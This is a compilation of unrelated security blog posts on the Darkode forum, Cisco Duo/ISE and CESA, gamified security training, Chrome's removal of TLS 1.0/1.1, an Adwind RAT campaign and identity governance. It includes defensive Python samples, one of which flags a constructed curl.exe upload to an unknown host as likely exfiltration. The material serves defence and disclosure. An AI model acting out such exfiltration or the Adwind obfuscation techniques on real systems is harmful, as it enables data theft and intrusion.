More recently, Škorjanc served as chief technology officer at NiceHash, a Slovenian company that lets users sell their computing power to help others mine virtual currencies like bitcoin. In December 2017, approximately USD $52 million worth of bitcoin mysteriously disappeared from the coffers of NiceHash. Slovenian police are reportedly still investigating that incident.

The “sellers” page on the Darkode cybercrime forum, circa 2013.

It will be interesting to see what happens with the fourth and sole U.S.-based defendant added in the latest DOJ charges — Thomas K. McCormick, a.k.a. “fubar” — allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.”

Between 2010 and 2013, Fubar would randomly chat me up on instant messenger apropos of nothing to trade information about the latest goings-on in the malware and cybercrime forum scene.

Fubar frequently knew before anyone else about upcoming improvements to or new features of ZeuS, and discussed at length his interactions with Iserdo/Škorjanc. Every so often, I would reach out to Fubar to see if he could convince one of his forum members to call off an attack against KrebsOnSecurity.com, an activity that had become something of a rite of passage for new Darkode members.

On Dec. 5, 2013, federal investigators visited McCormick at his University of Massachusetts dorm room. According to a memo filed by FBI agents investigating the case, in that interview McCormick acknowledged using the “fubar” identity on Darkode, but said he’d quit the whole forum scene years ago, and that he’d even interned at Microsoft for several summers and at Cisco for one summer.

A subsequent search warrant executed on his dorm room revealed multiple removable drives that held tens of thousands of stolen credit card records. For whatever reason, however, McCormick wasn’t arrested or charged until December 2018.

According to the FBI, back in that December 2013 interview McCormick voluntarily told them a great deal about his various businesses and online personas. He also apparently told investigators he talked with KrebsOnSecurity quite a bit, and that he’d tipped me off to some important developments in the malware scene. For example:

“TM had found the email address of the Spyeye author in an old fake antivirus affiliate program database and that TM was able to find the true name of the Spyeye author from searching online for an individual that used the email address,” the memo states. “TM passed this information on to Brian Krebs.”

Read more of the FBI’s interview with McCormick here (PDF).

Duo and ISE Integrated Use Case – Delivering Zero Trust security for the workforce and workplace

This blog series will highlight exciting new developments and integrations between solutions within the Cisco Security portfolio with our acquisition of Duo Security. These posts will cover details about the problems that are being solved by these integrations with links to helpful technical documentation if you are interested in seeing for yourself the benefits that are provided. If you would like further information on how you can improve your security posture by leveraging these integrations, please contact our sales team.

Zero trust is a comprehensive security approach that secures access by your users, devices, applications and networks. This approach to security helps organizations implement practices that establish trust in the users and devices accessing sensitive applications and network resources, helping to prevent unauthorized access and reducing the risk of an attacker’s lateral movement through the network.

To protect the workforce, a zero trust security approach ensures only the right users and secure devices can access applications. And for the workplace, it secures all user and device connections across the network, including IoT. The integrations provided between Duo Security and Cisco’s Identity Services Engine (ISE) provide the zero trust application and network access controls you need for the workforce and workplace.

Use Case 1: Zero trust remote access

ISE and the AnyConnect Secure Mobility Client empower your mobile workforce with secure Virtual Private Network (VPN) access to the workplace. By integrating with Duo, you gain enhanced device visibility and multi-factor authentication (MFA), and you establish device trust.

Problem Solved: Customers who want to implement additional verification of the user when providing access to their corporate network via VPN. The motivators behind this requirement are:

  • VPN access gives end users access to the entire network, and many environments do not have a network segmentation policy robust enough to restrict users to only the resources they need. The next best step for protection is to implement MFA, which gives a higher level of confidence that the user is who they say they are.
  • Credential compromise is still one of the biggest reasons customers get breached.
  • Compliance (HIPAA, PCI-DSS, etc.).

Solution: You can enhance remote access security with Duo Security, Cisco ISE, and the AnyConnect Secure Mobility Client. It’s easy to add multi-factor authentication to VPN access so that you can verify the trust in remote users. Here’s how:

The Cisco AnyConnect Client and Cisco ASA use Cisco ISE for access control. Customers add the Duo Authentication Proxy as a second authentication source in Cisco ISE. Upon AnyConnect login, users are prompted for 2FA from Duo.

Use Case 2: Zero trust network administration

ISE controls network administrator access to critical network infrastructure equipment like switches and routers, with the added security layer of Duo’s multi-factor authentication to mitigate the risk of unauthorized access that could result in intentional misconfigurations causing severe network outages.

Problem Solved: Most customers have network devices (routers, switches, etc.) in their environments that require access to manage and configure. Many of these network devices use a Cisco protocol called TACACS+ to authenticate and authorize end user admin access to the network device. Customers want to enable MFA for admin access to these network devices.

Solution: With the Duo MFA integration with ISE for TACACS+ device administration with Microsoft Active Directory users, customers can protect admin access to network devices that use the TACACS+ protocol: primary authentication is handled by ISE, and 2FA by Duo via the Duo Authentication Proxy.

Stay tuned for more integration stories and use cases. You can learn more about Cisco Zero Trust here, and if you want to see the powerful security controls that Duo offers you can sign up for a free trial at sign-up.duo.com.

Find What Your Endpoint Anti-Malware is Missing with CESA Built on Splunk

There are many aspects to securing an endpoint beyond finding the malware on it. What do you know about the behavior of your endpoints? Can you track anomalous traffic? Can you tell what the applications and other software processes are up to? What is happening when the device is off the corporate network? Has a user or device evaded endpoint security measures? With insight into such issues, you can gain visibility that not only follows endpoints on and off the network, but also finds threats often not addressed by anti-malware solutions.

With this in mind, Cisco has created a solution unlike anything available in the industry today — Cisco Endpoint Security Analytics (CESA) Built on Splunk. This new solution brings together the unparalleled endpoint behavioral visibility of Cisco’s AnyConnect Network Visibility Module (NVM) and the data transformation power of the Splunk analytics platform. The result is an added layer of deep endpoint visibility that transforms endpoint-centric data into insights to proactively detect and mitigate network threats.

If you already use AnyConnect NVM, you know it creates a lot of detailed, endpoint-specific data. But by building and productizing CESA on top of Splunk, we’ve paired that data with an equally comprehensive and cost-effective analytics tool. CESA addresses endpoint security use cases such as:

  • Unapproved applications and SaaS visibility
  • Endpoint security evasion
  • Attribution of user to device to application to traffic and destination
  • Zero-trust monitoring
  • Data loss detection
  • Day-zero malware and threat hunting
  • Asset inventory

The behavioral data produced by NVM complements anti-malware agents like Cisco Advanced Malware Protection (AMP) for Endpoints, which primarily focus on file analysis to detect malware on endpoints and therefore identify known issues. Because CESA analyzes user and device behavior and identifies changes and anomalies, it enables threat hunters and analysts to discover malicious or suspicious endpoint activity, often without an additional endpoint agent. Where antivirus and other endpoint solutions would miss these threats, CESA provides early detection that improves security posture. CESA endpoint analytics also complements the broad network visibility provided by Cisco Stealthwatch by following endpoints on and off the network, and by enabling deep endpoint insight down to the user account, device details, and network interface levels of the endpoint. Together, CESA and Stealthwatch cover every aspect of network and endpoint behavior, leaving no blind spot unchecked.

How we address endpoint blindness

Even as security products continue to integrate, endpoint blindness is a persistent problem. Information security (infosec) teams need to know more about what is happening on the endpoints to anticipate where attacks are more likely to occur.

By leveraging the NVM telemetry that endpoints provide, we gain a better understanding of users’ network behaviors and where threats are going to happen. These insights can raise potential red flags like:

  • Are my endpoints suddenly communicating with domains we’ve not seen in our environment before?
  • Has a user changed behavior suddenly, using applications and visiting hosts they don’t usually access?
  • Does an endpoint have unusual traffic patterns? Is it uploading or downloading more than usual? Is someone hoarding or exfiltrating data?
  • Are any machines using unapproved applications or SaaS services?
  • Has security been disabled on an endpoint?
  • Which endpoints have known bad files or applications?
  • What are my users doing when they are not connected to my network?
  • Which devices and operating systems are in use in my endpoint environment?
  • Who is using each device and what are they doing with it?
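As an added illustration of the questions above (example code written for this page, not Cisco's or Splunk's, and not a reproduction of the NVM record schema), the following Python runs simple detection logic over constructed per-flow endpoint records that carry the kind of context the post lists: user, device, process, destination, bytes up and down, and whether the endpoint was on the corporate network. The field names, the baselines and the records themselves are assumptions made for the example.

```python
"""Detection logic over constructed endpoint flow records.

The record fields (user, device, process, destination, bytes up/down, on/off
network) mirror the kinds of context the post says NVM attaches to endpoint
traffic; the real NVM schema is not assumed and every record is constructed.
"""
from collections import defaultdict
from statistics import median

# Constructed sample: one day of per-flow endpoint telemetry.
FLOWS = [
    {"user": "alice", "device": "LT-0142", "process": "chrome.exe",
     "dst": "mail.example.com", "up": 12_000, "down": 850_000, "on_net": True},
    {"user": "alice", "device": "LT-0142", "process": "chrome.exe",
     "dst": "docs.example.com", "up": 9_000, "down": 2_100_000, "on_net": True},
    {"user": "bob", "device": "LT-0317", "process": "outlook.exe",
     "dst": "mail.example.com", "up": 30_000, "down": 640_000, "on_net": False},
    # bob's laptop, off network, pushes 1.8 GB to a never-seen host from an unexpected binary
    {"user": "bob", "device": "LT-0317", "process": "curl.exe",
     "dst": "xfer-7b2.example.net", "up": 1_800_000_000, "down": 4_000, "on_net": False},
    {"user": "carol", "device": "LT-0509", "process": "svchost.exe",
     "dst": "update.example.com", "up": 5_000, "down": 70_000_000, "on_net": True},
]

# Constructed baselines, as an analyst would derive them from prior weeks of data.
KNOWN_DOMAINS = {"mail.example.com", "docs.example.com", "update.example.com"}
APPROVED_PROCESSES = {"chrome.exe", "outlook.exe", "svchost.exe", "teams.exe"}
# Per-device total upload bytes for each of the previous 7 days (constructed).
UPLOAD_HISTORY = {
    "LT-0142": [18_000, 22_000, 15_000, 30_000, 19_000, 21_000, 17_000],
    "LT-0317": [40_000, 35_000, 52_000, 38_000, 41_000, 36_000, 44_000],
    "LT-0509": [6_000, 4_000, 9_000, 5_000, 7_000, 5_500, 6_500],
}


def new_destinations(flows, known):
    """Q: are endpoints talking to domains we have not seen in the environment before?"""
    return sorted({f["dst"] for f in flows if f["dst"] not in known})


def unapproved_processes(flows, approved):
    """Q: which user/device pairs generate traffic from software not on the approved list?"""
    return sorted({(f["user"], f["device"], f["process"])
                   for f in flows if f["process"] not in approved})


def upload_outliers(flows, history, factor=10):
    """Q: is an endpoint uploading far more than usual (a hoarding/exfiltration signal)?

    Flags a device whose total upload today exceeds `factor` times its historical
    daily median; the median resists one-off spikes already in the baseline.
    Returns {device: multiple-of-baseline}.
    """
    today = defaultdict(int)
    for f in flows:
        today[f["device"]] += f["up"]
    hits = {}
    for dev, total in today.items():
        base = median(history.get(dev, [0]))
        if base and total > factor * base:
            hits[dev] = round(total / base)
    return hits


def off_network_activity(flows):
    """Q: what are users doing when they are not connected to the corporate network?"""
    return sorted({(f["user"], f["device"], f["dst"]) for f in flows if not f["on_net"]})


def triage(flows):
    """Attribute each signal along user -> device -> process -> destination for the analyst."""
    uploads = upload_outliers(flows, UPLOAD_HISTORY)
    findings = []
    for f in flows:
        reasons = []
        if f["dst"] not in KNOWN_DOMAINS:
            reasons.append("new-destination")
        if f["process"] not in APPROVED_PROCESSES:
            reasons.append("unapproved-process")
        if f["device"] in uploads:
            reasons.append(f"upload-{uploads[f['device']]}x-baseline")
        if reasons:
            findings.append((f["user"], f["device"], f["process"], f["dst"], reasons))
    return findings


if __name__ == "__main__":
    for user, device, proc, dst, reasons in triage(FLOWS):
        print(f"{user:6} {device} {proc:12} -> {dst:24} {', '.join(reasons)}")
```

The point of `triage` is the attribution chain the post describes: a device-level volume anomaly is joined back to the user, the process and the destination, so that the analyst sees one correlated finding rather than three unrelated alerts. In practice the baselines would be computed from the same telemetry store rather than hard-coded.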

It’s important to note that CESA is integrated into the Cisco Security infrastructure. CESA works together with network visibility from Cisco Stealthwatch and endpoint control from Cisco AMP for Endpoints. Additionally, Cisco Identity Services Engine (ISE) is used to quarantine users when identified as suspicious. These integrations serve to further increase the security posture of the network.

Cisco’s CSIRT team uses CESA

Many of our case studies come from our partners and customers, but this time our Cisco infosec team put together a case study as they leveraged CESA within the Cisco organization. They used the solution to collect and analyze the data generated by NVM across approximately 96,000 endpoints, and extract context such as user, device, application, location, and destination. The analysis of this data, from when the user is both on- and off-prem, helped Cisco infosec reduce incident investigation time from days to hours, while filling gaps in endpoint visibility.

“Splunk makes accessing the data from NVM, writing queries, and analyzing the data very easy,” said Cisco CSIRT’s Imran Islam.

Before CESA, the infosec team would struggle to determine which user is associated with what machine. And drilling down further was difficult if not impossible – from identifying machine to traffic; from traffic to the application or software process producing it; and then the traffic’s destination, whether inbound or outbound. It was reported by the Cisco infosec team that 80% of CESA use cases could not have been addressed by other technology.

Partnering to create a more secure network

At Cisco, we’re leading the industry in multi-vendor partnering solutions because we understand that collaboration is key to our customers having effective and efficient security across their networks — from endpoint to data center and cloud to campus. In fact, the Internet Engineering Task Force (IETF) recently standardized the XMPP-Grid security data exchange framework – based on Cisco Platform Exchange Grid (pxGrid) – which enables seamless collaboration and the sharing of information between security platforms from multiple vendors.

While no one product can achieve absolute security, no security solution exists in complete isolation. As security products become more interconnected, share context for threats, and participate in incident response, the risk of data breaches and security incidents is increasingly mitigated. This is why we believe in working so closely with our partners like Splunk through the Cisco Security Technical Alliance to integrate solutions that protect against emerging threats and improve customer security.

Splunk’s analytics-driven security solutions continue to serve as a perfect complement to Cisco Security. And we’re excited to see CESA deliver endpoint visibility and advanced threat detection for our customers. Cisco AnyConnect (Cisco’s VPN Client) is already deployed by over 150 million endpoints, and many customers are already running the Splunk console, which makes CESA a simple addition that will bring immense value for infosec’s ability to anticipate and stop endpoint threats before they manifest on the network.

If you don’t yet have these products, learn more about CESA and how you can add Cisco AnyConnect NVM and Splunk here. Stay tuned in the coming weeks for added CESA integration with Cisco Umbrella to enable enforcement at the domain level.

You can learn more about how Cisco infosec utilized CESA in this case study. 

Want to get started with CESA today? If you already have Splunk and AnyConnect, download and install the Cisco AnyConnect NVM App for Splunk from Splunkbase to create dashboards. Then, download and install the Cisco NVM Technology Add-On for Splunk from Splunkbase to bring NVM data into Splunk. Finally, turn on NVM telemetry in your AnyConnect environment as outlined in these tech docs.

Finally, be sure to follow me on Twitter and LinkedIn for the latest announcements from Cisco Security.

Rethinking how we learn security

A couple of years ago, I wrote an article on the relative lack of investor and startup interest in addressing a crucial CISO priority—the preparedness of employees on the security team. Considering what seems to be a steady stream of news about breaches, what can be done to encourage more people to get into cybersecurity and how we can better prepare cyber pros to succeed?

In my own experience, I’ve read white papers and manuals, taken bootcamps and practice tests, and slogged through hours of recorded content. It’s a lot to process, and mostly dependent on the quality of the instructor or delivery format. In this evolving threat environment, content is also outdated as soon as it’s published. Also, training for security professionals is focused on certifications, not necessarily practical outcomes.

There’s also an organizational problem: Who in an enterprise owns cyber readiness? HR? A Chief Learning Officer? The CISO? If we’re going to find, hire, and retain tomorrow’s cyber workforce, we must rethink how we reach and prepare people for their careers, so they can continuously learn and stay current on the threats and the tools in front of them. With up to 2 million unfilled cyber roles, this is really a societal challenge.

One innovator that is addressing this is Boulder, Colorado-based Circadence Corporation. I met their CEO, Mike Moniz, at a cyber conference in DC. After one conversation, and upon seeing their “Project Ares®” cyber learning platform, I knew they were on to something. Since then, Circadence and Microsoft have built a very promising partnership to help Circadence scale globally to reach and train more of tomorrow’s cyber workforce. They’re doing this by using Azure infrastructure and platform services, and they enjoy the partnership and the support that comes with it.

Circadence focuses on cybersecurity learning and readiness. They build and run immersive, gamified cyber ranges that create a real-time cyber learning environment. Chief among these is Project Ares, which supports all security proficiency levels of an individual or team—from early career starters to seasoned cyber professionals—for enterprise, government, and academic organizations. Artificial intelligence (AI) powers the delivery of gamified training exercises in battle room and mission virtual machine environments based on actual cyberattack scenarios happening today—such as ransomware, advanced persistent threats, and attacks against industrial control systems.

I signed up for a Circadence account and gave it a shot. I’m not a gamer, but I was really impressed with the UI. Was Circadence actually trying to make learning fun? Project Ares is rooted in proven learning theories and cognitive research. They used resources like Bloom’s Taxonomy of Learning and educational concepts like “reinforcement learning” and “cognitive disfluency” (interrupting the flow of learning with the inclusion of testing, questionnaires, and polls) to match accepted learning concepts with gamified experiences. This isn’t just about making a video game for cyber. And it isn’t just “fun” but informative, educational, practical, and equally innovative without being intimidating.

The learning scenarios are immersive and address varied learning styles, which are two critical design points for maintaining player engagement and lengthening attention span. The platform draws learners across the stages of Bloom’s Taxonomy by:

  • Starting with explanations of techniques, skills, or adversary tactics.
  • Progressing through application of those skills in controlled battle rooms.
  • Arriving at the synthesis of skills and critical thinking to analyze, evaluate, and take actions in an emulated, high-fidelity network against actual malware and emulated threat actors.

Project Ares provides multiple scenarios along a work-role learning path, where you’re required to not only read about cybersecurity, but also must evaluate events in a true network and generate options to achieve objectives. The current catalog contains over 30 cyber games, battle rooms, and missions that provide exposure and experience across many of NIST’s National Initiative on Cybersecurity Education (NICE) work roles in a modern, engaging way.

To learn more about security team training on gamified cyber security ranges in Azure, I sat down with Keenan Skelly, Vice President of Global Partnerships and Security Evangelist. You can watch my interview with Keenan.

This was a great overview of a partner thinking ahead in a creative way to address a major problem in cyber. I encourage anyone interested in improving their own cyber skills, or their team’s skills, to look at gamified learning. Given how younger people interact with IT, it’ll be increasingly important in how we attract them to the industry.

In my next post, I’ll dive deeper into practical learning and defender exercises. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Rethinking how we learn security appeared first on Microsoft Security.

Chrome UI for Deprecating Legacy TLS Versions


[Cross-posted from the Chromium blog]

Last October we announced our plans to remove support for TLS 1.0 and 1.1 in Chrome 81. In this post we’re announcing a pre-removal phase in which we’ll introduce a gentler warning UI, and previewing the UI that we’ll use to block TLS 1.0 and 1.1 in Chrome 81. Site administrators should immediately enable TLS 1.2 or later to avoid these UI treatments.

While legacy TLS usage has decreased, we still see over 0.5% of page loads using these deprecated versions. To ease the transition to the final removal of support and to reduce user surprise when outdated configurations stop working, Chrome will discontinue support in two steps: first, showing new security indicators for sites using these deprecated versions; and second, blocking connections to these sites with a full page warning.

Pre-removal warning

Starting January 13, 2020, for Chrome 79 and higher, we will show a “Not Secure” indicator for sites using TLS 1.0 or 1.1 to alert users to the outdated configuration:

The new security indicator and connection security information that will be shown to users who visit a site using TLS 1.0 or 1.1 starting in January 2020.

When a site uses TLS 1.0 or 1.1, Chrome will downgrade the security indicator and show a more detailed warning message inside Page Info. This change will not block users from visiting or using the page, but will alert them to the downgraded security of the connection.

Note that Chrome already shows warnings in DevTools to alert site owners that they are using a deprecated version of TLS.

Removal UI

In Chrome 81, which will be released to the Stable channel in March 2020, we will begin blocking connections to sites using TLS 1.0 or 1.1, showing a full page interstitial warning:

The full screen interstitial warning that will be shown to users who visit a site using TLS 1.0 or 1.1 starting in Chrome 81. Final warning subject to change.

Site administrators should immediately enable TLS 1.2 or later. Depending on server software (such as Apache or nginx), this may be a configuration change or a software update. Additionally, we encourage all sites to revisit their TLS configuration. In our original announcement, we outlined our current criteria for modern TLS.

Enterprise deployments can preview the final removal of TLS 1.0 and 1.1 by setting the SSLVersionMin policy to “tls1.2”. This will prevent clients from connecting over these protocol versions. For enterprise deployments that need more time, this same policy can be used to re-enable TLS 1.0 or TLS 1.1 and disable the warning UIs until January 2021.
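The configuration change the post asks site administrators to make is easy to get subtly wrong on Apache, where `SSLProtocol all -SSLv3` still leaves TLS 1.0 and 1.1 on. The following Python is an added example written for this page (not Chromium's code) that evaluates the real nginx `ssl_protocols` directive and the real Apache mod_ssl `SSLProtocol` directive, reports any legacy version still enabled, and prints the corrected directive. The treatment of Apache's `all` keyword as "every version a current OpenSSL build supports" and the sample configuration lines are assumptions made for the example.

```python
"""Audit server TLS protocol directives for the versions Chrome 81 will block.

Example code added for this page, not part of the Chromium post. Evaluates the
nginx `ssl_protocols` directive and the Apache mod_ssl `SSLProtocol` directive
and reports any SSLv3/TLS 1.0/TLS 1.1 still enabled. Sample lines are constructed.
"""
import re

LEGACY = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}
# Assumption: what Apache's `all` keyword expands to on a current OpenSSL build.
ALL_VERSIONS = {"SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2", "TLSv1.3"}

NGINX_FIX = "ssl_protocols TLSv1.2 TLSv1.3;"        # TLSv1.3 needs OpenSSL 1.1.1 or later
APACHE_FIX = "SSLProtocol -all +TLSv1.2 +TLSv1.3"


def nginx_enabled(directive):
    """nginx lists the enabled versions explicitly: `ssl_protocols TLSv1 TLSv1.1 TLSv1.2;`."""
    m = re.match(r"\s*ssl_protocols\s+(.+?)\s*;", directive)
    if not m:
        raise ValueError(f"not an ssl_protocols directive: {directive!r}")
    return set(m.group(1).split())


def apache_enabled(directive):
    """Apache applies +/- tokens left to right; `all` expands to every supported version.

    A bare token (no sign) counts as `+`. `SSLProtocol all -SSLv3` therefore still
    leaves TLSv1 and TLSv1.1 enabled, which is exactly the mistake this check catches.
    """
    tokens = directive.split()
    if not tokens or tokens[0].lower() != "sslprotocol":
        raise ValueError(f"not an SSLProtocol directive: {directive!r}")
    enabled = set()
    for tok in tokens[1:]:
        sign, name = (tok[0], tok[1:]) if tok[0] in "+-" else ("+", tok)
        names = set(ALL_VERSIONS) if name.lower() == "all" else {name}
        if sign == "+":
            enabled |= names
        else:
            enabled -= names
    return enabled


def legacy_versions(enabled):
    """Sorted list of the deprecated versions present in an enabled-version set."""
    return sorted(enabled & LEGACY)


def fixed_directive(directive):
    """Corrected form of a directive that still allows a legacy version (unchanged if clean)."""
    s = directive.strip()
    if s.startswith("ssl_protocols"):
        return NGINX_FIX if legacy_versions(nginx_enabled(s)) else s
    if s.lower().startswith("sslprotocol"):
        return APACHE_FIX if legacy_versions(apache_enabled(s)) else s
    raise ValueError(f"unrecognised directive: {directive!r}")


def audit(lines):
    """Map each TLS directive found in `lines` to the legacy versions it still permits."""
    results = {}
    for line in lines:
        s = line.strip()
        if s.startswith("ssl_protocols"):
            results[s] = legacy_versions(nginx_enabled(s))
        elif s.lower().startswith("sslprotocol"):
            results[s] = legacy_versions(apache_enabled(s))
    return results


# Constructed sample: a weak setting beside its corrected form for each server.
SAMPLE = [
    "ssl_protocols TLSv1 TLSv1.1 TLSv1.2;",   # nginx, still offers TLS 1.0/1.1
    "ssl_protocols TLSv1.2 TLSv1.3;",         # nginx, corrected
    "SSLProtocol all -SSLv3",                 # Apache, TLS 1.0/1.1 remain via `all`
    "SSLProtocol -all +TLSv1.2 +TLSv1.3",     # Apache, corrected
]

if __name__ == "__main__":
    for line, legacy in audit(SAMPLE).items():
        status = f"LEGACY {legacy} -> {fixed_directive(line)}" if legacy else "ok"
        print(f"{line:42} {status}")
```

A static check like this only tells you what the configuration file asks for; after restarting the server, confirm the negotiated behaviour from a client (for example with `openssl s_client -tls1_1`, which should fail to connect once the change is live), because an older OpenSSL library or an overriding virtual-host block can still differ from the directive you edited.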

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back: a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRAT, AlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign; the spam messages come with malicious attachments or include a URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java; it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered in early 2012, when experts dubbed it Frutas RAT; it was later identified under other names: Unrecom RAT (February 2014), AlienSpy (October 2014), and more recently JSocket RAT (June 2015).

Adwind can infect all the major operating systems, including Windows, Mac, Linux, and Android, and it is available in the cybercrime underground under a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer, it can recruit it into a botnet for several illegal purposes (e.g. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as in previous variants; the major change is in the obfuscation technique it implements. The malware delivers RAT payloads via nested JAR archives. Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur,” continues the analysis.
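As an added example for the nested-JAR packaging described above (written for this page; not Netskope's tooling and not derived from the actual samples), the following Python builds a constructed three-level JAR-in-JAR sample in memory and then walks it recursively without executing anything, recording each embedded archive's depth, hash, `Main-Class` and class list. The member names, manifests and byte contents are all constructed.

```python
"""Static triage of nested JAR archives (added example, not Netskope's tooling).

Builds a constructed three-level JAR-in-JAR sample in memory, then walks it
recursively without executing anything, reporting each embedded archive and
its classes. This shows how deep the packaging goes before a sample is handed
to a sandbox; nothing in here runs Java code.
"""
import hashlib
import io
import zipfile


def build_jar(members):
    """Return the bytes of a JAR (a zip) containing the given {name: bytes} members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: a payload JAR wrapped inside two loader JARs. The .class
# members are only the Java class-file magic plus padding, not real bytecode.
FAKE_CLASS = b"\xca\xfe\xba\xbe" + b"\x00" * 16
INNER = build_jar({"META-INF/MANIFEST.MF": b"Main-Class: Payload\n",
                   "Payload.class": FAKE_CLASS})
MIDDLE = build_jar({"META-INF/MANIFEST.MF": b"Main-Class: Loader2\n",
                    "Loader2.class": FAKE_CLASS,
                    "res/blob.dat": INNER})
OUTER = build_jar({"META-INF/MANIFEST.MF": b"Main-Class: Loader1\n",
                   "Loader1.class": FAKE_CLASS,
                   "data/stage.bin": MIDDLE})


def is_zip(data):
    """Cheap magic check: zip/JAR local file headers start with 'PK'."""
    return data[:2] == b"PK"


def main_class(zf):
    """Read Main-Class from META-INF/MANIFEST.MF if the archive has one."""
    if "META-INF/MANIFEST.MF" not in zf.namelist():
        return None
    for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
        if line.startswith("Main-Class:"):
            return line.split(":", 1)[1].strip()
    return None


def walk_jar(data, path="<root>", depth=0, out=None):
    """Recursively record (depth, path, sha256, main_class, classes) for every embedded JAR.

    Any non-.class member whose bytes look like a zip is opened as another JAR, so a
    payload hidden under an innocuous name such as res/blob.dat is still found.
    """
    if out is None:
        out = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        out.append({
            "depth": depth,
            "path": path,
            "sha256": hashlib.sha256(data).hexdigest(),
            "main_class": main_class(zf),
            "classes": [n for n in names if n.endswith(".class")],
        })
        for n in names:
            member = zf.read(n)
            if not n.endswith(".class") and is_zip(member):
                walk_jar(member, f"{path}/{n}", depth + 1, out)
    return out


def max_depth(data):
    """Nesting depth of the deepest embedded JAR (0 for a flat JAR)."""
    return max(e["depth"] for e in walk_jar(data))


if __name__ == "__main__":
    for e in walk_jar(OUTER):
        print(f"{'  ' * e['depth']}{e['path']}  main={e['main_class']}  "
              f"classes={e['classes']}  sha256={e['sha256'][:12]}...")
```

The magic check only finds stages stored as plain zip data. The post notes that the final JAR in these samples is decrypted at runtime, so a real triage pass would need to apply that decryption step (or dump the stage from a sandbox) before the walk can continue; the hashes this records at each level are what you compare against the report's IoCs.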

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58,” concludes the analysis. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netskope’s report includes indicators of compromise (IoCs): malware sample hashes for the various JAR payloads used in these attacks, and IP addresses and domains of the C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Six Strategies to Ensure You Give the Right Access to the Right People at the Right Time

Part 2 of the Improving Your Security-Efficiency Balance Series:  

One of the primary challenges organizations wrestle with in identity governance is how to achieve the right balance in their company between security and efficiency. In Part 1 of the Improving Your Security-Efficiency Balance Series, we examined the unique balancing act organizations face when it comes to user access. In this blog, we will examine practical ways you can create this balance to ensure access is only given to those users who absolutely need it. Let’s take a look at six key ways to help you reach a practical balance between these priorities, so you can enable access that is necessary for your organization to remain competitive in today’s business environment and be confident you are managing access risks appropriately. Striking the right balance ultimately comes down to adopting a comprehensive, strategic, and intelligent approach to identity governance and administration in your organization.

1) Automate Provisioning Around the User Lifecycle

One way to improve the balance between security concerns and the desire for user efficiency is to automate provisioning actions based on the user’s lifecycle within an organization. This typically starts with the user’s first relationship with the organization, as a job applicant or employee, and concludes with the user separating from the organization. In between these events are multiple changes and access requirements that must be managed closely.

The first step in the user lifecycle is onboarding. This is where a new employee, or a non-employee like a contractor or vendor, receives initial accounts and access to appropriate systems and applications. Once onboarded, a user may need new or different access when transferred. This occurs typically when an employee changes job roles, moves to a new department, or reports to a new manager. And finally, the last part of the user lifecycle is when an employee leaves the organization, either voluntarily or through termination. For the latter, accounts should be quickly and automatically disabled, preventing any opportunity for employees to retain access to data upon their departure from the organization.

Automating provisioning around the user lifecycle truly enables employees to be productive on day one rather than waiting around for access. It also decreases the reliance on IT resources and increases security by reducing risk associated with manual provisioning mistakes. At the very least, when provisioning automation is not practical or feasible, automated workflow and access policies for requesting, approving, tracking, and auditing should be deployed. This is where a role-based approach to developing these access policies often works best.

2) Adopt a Role-Based Approach

Another effective way to improve balance is by leveraging role-based access policies. Think of a role as a collection of access privileges typically defined around a job title or job function. Using roles, organizations have solid, predefined, and preapproved access policies in place, and know specifically which access privileges each person needs. Embracing a role-based approach simplifies identity governance and administration, and aids organizations particularly as they grow and change—whether through individual changes across the user lifecycle, seasonal additions to the workforce, or more institutional changes, like mergers and acquisitions.

3) Leverage a One-Stop Shop for User Access

Even with well-defined roles making onboarding and institutional changes more effective, secure and efficient, additional access and ad-hoc changes are always ‘the norm.’ To handle these just as effectively, a centralized portal for completing access requests and approvals should be deployed. Providing a one-stop shop for users to request additional access ensures employees go through proper channels, and reinforces that proper approval and fulfillment policies are followed. A centralized system makes it easy for users to request access across various applications, and it provides consistent, business-friendly methods for requesting that access. Another advantage of a one-stop shop is the consistent audit trail of requests and approvals, giving organizations an up-to-date status for each access request.

4) Conduct Frequent Access Reviews

Frequent access reviews or certifications are another key area for improving the balance between security and efficiency. Within the climate of regulatory compliance and security, it’s imperative to review user access periodically. Access reviews must be simple and easy to manage so managers do not just rubber stamp their approvals. Rather than a manual process where organizations pass around spreadsheets among reviewers, a more intelligent, visual solution is a must-have to group like-access privileges together. This enables managers to understand which users have access to specific systems, and which users are outliers in their privileges. After all, an easier review process leads to greater accuracy, improved reporting, and greater adoption within the organization.

